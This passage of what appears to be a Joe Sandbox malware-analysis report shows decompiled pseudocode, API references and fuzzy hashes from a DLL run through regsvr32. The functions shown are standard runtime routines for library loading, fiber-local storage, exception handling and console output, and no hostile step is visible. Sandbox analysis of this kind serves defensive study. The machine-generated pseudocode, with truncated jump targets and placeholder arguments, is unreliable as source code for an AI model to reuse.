				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
				if (_t60 == 0) goto 0x8000a469;
				if (_t60 != _t72) goto 0x8000a55e;
				goto 0x8000a4f0;
				r8d = 0x800;
				LoadLibraryExW(_t102, _t97, _t94);
				if (_t56 != 0) goto 0x8000a53e;
				if (GetLastError() != 0x57) goto 0x8000a4de;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = 0;
				LoadLibraryExW(_t91, _t71);
				if (_t56 != 0) goto 0x8000a53e;
				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0x8000a44a;
				_t90 =  *0x80021010; // 0xeaed15642a89
				asm("dec eax");
				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

















                                                                                                0x18000a3dc
                                                                                                0x18000a3e1
                                                                                                0x18000a3e6
                                                                                                0x18000a3f8
                                                                                                0x18000a402
                                                                                                0x18000a418
                                                                                                0x18000a41f
                                                                                                0x18000a428
                                                                                                0x18000a42e
                                                                                                0x18000a437
                                                                                                0x18000a439
                                                                                                0x18000a43c
                                                                                                0x18000a444
                                                                                                0x18000a44d
                                                                                                0x18000a459
                                                                                                0x18000a45e
                                                                                                0x18000a464
                                                                                                0x18000a476
                                                                                                0x18000a47c
                                                                                                0x18000a488
                                                                                                0x18000a497
                                                                                                0x18000a499
                                                                                                0x18000a499
                                                                                                0x18000a49f
                                                                                                0x18000a4b0
                                                                                                0x18000a4b2
                                                                                                0x18000a4c6
                                                                                                0x18000a4c8
                                                                                                0x18000a4d0
                                                                                                0x18000a4dc
                                                                                                0x18000a4e8
                                                                                                0x18000a4f7
                                                                                                0x18000a4fd
                                                                                                0x18000a511
                                                                                                0x18000a517
                                                                                                0x18000a53d

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3013587201-537541572
                                                                                                • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                                • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00000001800045BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 50%
                                                                                                			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				struct HINSTANCE__* _t81;
				long long _t85;
				void* _t89;
				struct HINSTANCE__* _t94;
				long _t97;
				void* _t100;
				signed long long _t101;
				WCHAR* _t104;

				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = _t85;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t101 = _t100 | 0xffffffff;
				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
				if (_t61 == _t101) goto 0x800046eb;
				if (_t61 != 0) goto 0x800046ed;
				if (__r8 == __r9) goto 0x800046e3;
				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
				if (_t67 == 0) goto 0x8000462e;
				if (_t67 != _t101) goto 0x800046c5;
				goto 0x80004699;
				r8d = 0x800;
				LoadLibraryExW(_t104, _t100, _t97);
				_t68 = _t61;
				if (_t61 != 0) goto 0x800046a5;
				if (GetLastError() != 0x57) goto 0x80004687;
				_t14 = _t68 + 7; // 0x7
				r8d = _t14;
				if (E00000001180007070(__r8) == 0) goto 0x80004687;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t61 != 0) goto 0x800046a5;
				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
				goto 0x8000460c;
				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
				_t65 =  *_t21;
				 *_t21 = _t61;
				if (_t65 == 0) goto 0x800046c5;
				FreeLibrary(_t94);
				GetProcAddress(_t81);
				if (_t65 == 0) goto 0x800046e3;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
				goto 0x800046ed;
				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
				return 0;
			}















                                                                                                0x1800045bc
                                                                                                0x1800045c1
                                                                                                0x1800045c6
                                                                                                0x1800045e1
                                                                                                0x1800045ee
                                                                                                0x1800045fa
                                                                                                0x180004603
                                                                                                0x18000460c
                                                                                                0x180004615
                                                                                                0x180004621
                                                                                                0x180004626
                                                                                                0x18000462c
                                                                                                0x18000463b
                                                                                                0x180004641
                                                                                                0x180004647
                                                                                                0x18000464d
                                                                                                0x180004658
                                                                                                0x18000465a
                                                                                                0x18000465a
                                                                                                0x18000466f
                                                                                                0x180004671
                                                                                                0x180004679
                                                                                                0x180004685
                                                                                                0x180004691
                                                                                                0x1800046a0
                                                                                                0x1800046af
                                                                                                0x1800046af
                                                                                                0x1800046af
                                                                                                0x1800046ba
                                                                                                0x1800046bf
                                                                                                0x1800046cb
                                                                                                0x1800046d4
                                                                                                0x1800046d9
                                                                                                0x1800046e1
                                                                                                0x1800046e3
                                                                                                0x180004709

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                                • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                                • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                                • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 2559590344-2084034818
                                                                                                • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                                • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180007DB8 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 2506987500-0
                                                                                                • Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                                • Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 000000018000F374 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                • String ID: CONOUT$
                                                                                                • API String ID: 3230265001-3130406586
                                                                                                • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                                • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180007F30 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                                • FlsSetValue.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                                • FlsSetValue.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                                • FlsSetValue.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                                • FlsSetValue.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                                • SetLastError.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 2506987500-0
                                                                                                • Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                                • Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180014C90 Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1967609040-0
                                                                                                • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                                • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180003B5C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 63%
                                                                                                			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t101;
				void* _t109;
				intOrPtr _t111;
				signed int* _t115;
				intOrPtr* _t136;
				void* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t159;

				_t109 = _t144;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rbp;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				_t136 = __rcx;
				_t139 = __r9;
				_t159 = __r8;
				_t142 = __rdx;
				E00000001180004584(_t55, __r8);
				E00000001180002D40(_t109);
				_t115 = _a40;
				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
				if ( *__rcx != 0x80000029) goto 0x80003bc2;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
				if ( *__rcx == 0x80000026) goto 0x80003bde;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
				if (_t115[1] == 0) goto 0x80003d6d;
				if (_a48 != 0) goto 0x80003d6d;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
				if ( *__rcx != 0x80000026) goto 0x80003c41;
				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
				r9d = _t60;
				E000000011800040F0(_t109, _t142, __r9, _t115);
				goto 0x80003d6d;
				if ( *_t136 != 0x80000029) goto 0x80003c63;
				r9d =  *((intOrPtr*)(_t136 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
				goto 0x80003c31;
				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
				goto 0x80003d6d;
				if (_t115[3] != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
				_t101 = _t115[8];
				if (_t101 == 0) goto 0x80003c9e;
				E00000001180002408(_t109);
				if (_t101 != 0) goto 0x80003cbe;
				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
				_t111 =  *((intOrPtr*)(_t136 + 0x30));
				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
				E0000000118000241C(_t111);
				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t115;
				 *0x80016370(_t158);
				goto 0x80003d72;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t115;
				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
				return 1;
			}



















                                                                                                0x180003b5c
                                                                                                0x180003b5f
                                                                                                0x180003b63
                                                                                                0x180003b67
                                                                                                0x180003b6b
                                                                                                0x180003b75
                                                                                                0x180003b78
                                                                                                0x180003b7e
                                                                                                0x180003b81
                                                                                                0x180003b84
                                                                                                0x180003b89
                                                                                                0x180003b8e
                                                                                                0x180003ba4
                                                                                                0x180003bac
                                                                                                0x180003bb0
                                                                                                0x180003bb6
                                                                                                0x180003bc0
                                                                                                0x180003bc4
                                                                                                0x180003bd2
                                                                                                0x180003bd8
                                                                                                0x180003be2
                                                                                                0x180003bec
                                                                                                0x180003bfa
                                                                                                0x180003c04
                                                                                                0x180003c08
                                                                                                0x180003c14
                                                                                                0x180003c1c
                                                                                                0x180003c25
                                                                                                0x180003c2b
                                                                                                0x180003c37
                                                                                                0x180003c3c
                                                                                                0x180003c43
                                                                                                0x180003c45
                                                                                                0x180003c4d
                                                                                                0x180003c57
                                                                                                0x180003c61
                                                                                                0x180003c6c
                                                                                                0x180003c71
                                                                                                0x180003c7a
                                                                                                0x180003c88
                                                                                                0x180003c8a
                                                                                                0x180003c8e
                                                                                                0x180003c90
                                                                                                0x180003c9c
                                                                                                0x180003caa
                                                                                                0x180003cb8
                                                                                                0x180003cc4
                                                                                                0x180003cca
                                                                                                0x180003cd3
                                                                                                0x180003cd5
                                                                                                0x180003cdd
                                                                                                0x180003cdf
                                                                                                0x180003cf2
                                                                                                0x180003d09
                                                                                                0x180003d18
                                                                                                0x180003d20
                                                                                                0x180003d27
                                                                                                0x180003d2c
                                                                                                0x180003d32
                                                                                                0x180003d3f
                                                                                                0x180003d51
                                                                                                0x180003d5f
                                                                                                0x180003d63
                                                                                                0x180003d68
                                                                                                0x180003d8c

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 851805269-3733052814
                                                                                                • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                                • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0000000180002A84 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 30%
                                                                                                			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
				void* _t76;
				void* _t83;
				void* _t84;
				intOrPtr _t101;
				intOrPtr _t103;
				void* _t113;
				void* _t118;
				void* _t130;
				long long _t133;
				intOrPtr* _t135;
				signed long long _t144;
				void* _t150;
				signed long long _t154;
				void* _t156;
				long long _t158;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				signed long long _t166;
				void* _t170;
				intOrPtr _t171;
				void* _t173;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t180;
				intOrPtr* _t181;

				_t130 = __rax;
				 *((long long*)(_t161 + 8)) = __rbx;
				 *((long long*)(_t161 + 0x10)) = _t158;
				 *((long long*)(_t161 + 0x18)) = __rsi;
				_t162 = _t161 - 0x40;
				_t159 = __rcx;
				_t181 = __r9;
				_t174 = __rdx;
				E00000001180004584(_t76, __r8);
				_t171 =  *((intOrPtr*)(__r9 + 8));
				_t135 =  *((intOrPtr*)(__r9 + 0x38));
				_t178 =  *__r9 - _t171;
				_t103 =  *((intOrPtr*)(__r9 + 0x48));
				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
				 *((long long*)(_t162 + 0x30)) = __rcx;
				 *((long long*)(_t162 + 0x38)) = __r8;
				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
				_t154 = __r8 + __r8;
				if (_t178 - _t130 < 0) goto 0x80002b9e;
				if (_t178 - _t130 >= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
				if (_t113 < 0) goto 0x80002ba5;
				if (_t113 <= 0) goto 0x80002b9e;
				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
				if ( *0x800164f8 == 0) goto 0x80002b5b;
				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
				_t83 =  *0x800164f8();
				r8d = 1;
				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
				r9d =  *_t159;
				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
				_t133 =  *((intOrPtr*)(_t181 + 0x28));
				 *((long long*)(_t162 + 0x20)) = _t133;
				__imp__RtlUnwindEx();
				E00000001180004580(_t84);
				goto 0x80002ada;
				goto 0x80002c5d;
				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
				goto 0x80002c4e;
				_t144 = _t174 + _t174;
				if (_t178 - _t133 < 0) goto 0x80002c4c;
				_t118 = _t178 - _t133;
				if (_t118 >= 0) goto 0x80002c4c;
				r10d =  *(_t159 + 4);
				r10d = r10d & 0x00000020;
				if (_t118 == 0) goto 0x80002c21;
				r9d = 0;
				if (_t101 == 0) goto 0x80002c1c;
				r8d = r9d;
				_t166 = _t159 + _t159;
				if (_t156 - _t133 < 0) goto 0x80002c14;
				if (_t156 - _t133 >= 0) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
				r9d = r9d + 1;
				if (r9d - _t101 < 0) goto 0x80002be4;
				if (r9d != _t101) goto 0x80002c58;
				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
				if (_t156 != _t133) goto 0x80002c4c;
				if (r10d != 0) goto 0x80002c58;
				goto 0x80002c4c;
				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
				 *((long long*)(_t166 + _t171))();
				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
				return 1;
			}






























                                                                                                0x180002a84
                                                                                                0x180002a84
                                                                                                0x180002a89
                                                                                                0x180002a8e
                                                                                                0x180002a9c
                                                                                                0x180002aa0
                                                                                                0x180002aa3
                                                                                                0x180002aac
                                                                                                0x180002aaf
                                                                                                0x180002ab4
                                                                                                0x180002abb
                                                                                                0x180002abf
                                                                                                0x180002ac6
                                                                                                0x180002aca
                                                                                                0x180002ad0
                                                                                                0x180002ad5
                                                                                                0x180002adc
                                                                                                0x180002ae4
                                                                                                0x180002aee
                                                                                                0x180002afb
                                                                                                0x180002b06
                                                                                                0x180002b11
                                                                                                0x180002b24
                                                                                                0x180002b26
                                                                                                0x180002b28
                                                                                                0x180002b31
                                                                                                0x180002b3b
                                                                                                0x180002b4b
                                                                                                0x180002b55
                                                                                                0x180002b5f
                                                                                                0x180002b6b
                                                                                                0x180002b77
                                                                                                0x180002b7e
                                                                                                0x180002b85
                                                                                                0x180002b8a
                                                                                                0x180002b8e
                                                                                                0x180002b93
                                                                                                0x180002b99
                                                                                                0x180002ba0
                                                                                                0x180002ba7
                                                                                                0x180002bb0
                                                                                                0x180002bb3
                                                                                                0x180002bba
                                                                                                0x180002bc4
                                                                                                0x180002bce
                                                                                                0x180002bd1
                                                                                                0x180002bd3
                                                                                                0x180002bd7
                                                                                                0x180002bdb
                                                                                                0x180002bdd
                                                                                                0x180002be2
                                                                                                0x180002be4
                                                                                                0x180002be7
